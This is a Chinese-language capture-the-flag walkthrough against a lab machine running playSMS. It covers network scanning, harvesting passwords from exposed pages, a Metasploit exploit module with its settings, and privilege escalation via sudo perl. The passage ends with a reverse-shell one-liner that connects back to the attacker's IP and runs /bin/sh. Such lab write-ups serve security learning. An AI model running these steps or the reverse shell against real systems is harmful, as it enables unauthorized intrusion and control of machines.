1.信息查询

1.1. Ip查询

arp-scan  -l

192.168.220.137

1.2. 端口收集

nmap -T4  -A  -p-  192.168.220.137

1.3. 目录扫描

dirsearch -u 192.168.220.137 -e* -i 200

通过访问 robots.txt 文件发现有些禁止访问得目录

User-agent: *Disallow: /ange1Disallow: /angel1Disallow: /nothingDisallow: /tmpDisallow: /uploads

访问各个页面，在访问 nothing 页面中有重大发现

通过查看源代码，发现了一些密码

freedompasswordhelloworld!dianaIloveroot

继续访问/secure 目录，发现一个backup的压缩文件。

下载backup.zip压缩包然后解压

但是发现需要密码

我们刚刚得到的密码一个一个试

密码是freedom，解压成功发现是一个mp3

记事本打开看看

uname: touhidpassword: ******url : /SecreTSMSgatwayLogin

通过访问提供的 url，得到一个登录页面

我们 touhid 作为用户名，用上面收集的密码进行尝试，最后发现密码为 diana，登录成功

2. 开始渗透

2.1. 进入msf

在kali中开启msf

msfconsole

查看CMS历史漏洞

search playSMS

经过尝试后，发现第二个可以利用，接下来尝试利用该漏洞来getshell

options

另开一个终端窗口查看自己的ip

192.168.220.146

set RHOSTS 192.168.220.137   # 靶机的ipset LHOST 192.168.220.146    # kali的ipset TARGETURI /SecreTSMSgatwayLogin/  # 需要登录playsms的路径set USERNAME touhid  # 登录的账号set PASSWORD diana   # 登录的密码exploit  # 爆破

2.1.  进入shell并提权

shellsudo  -l

sudo  perl -e 'use Socket;$i="192.168.220.146";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

另开一个窗口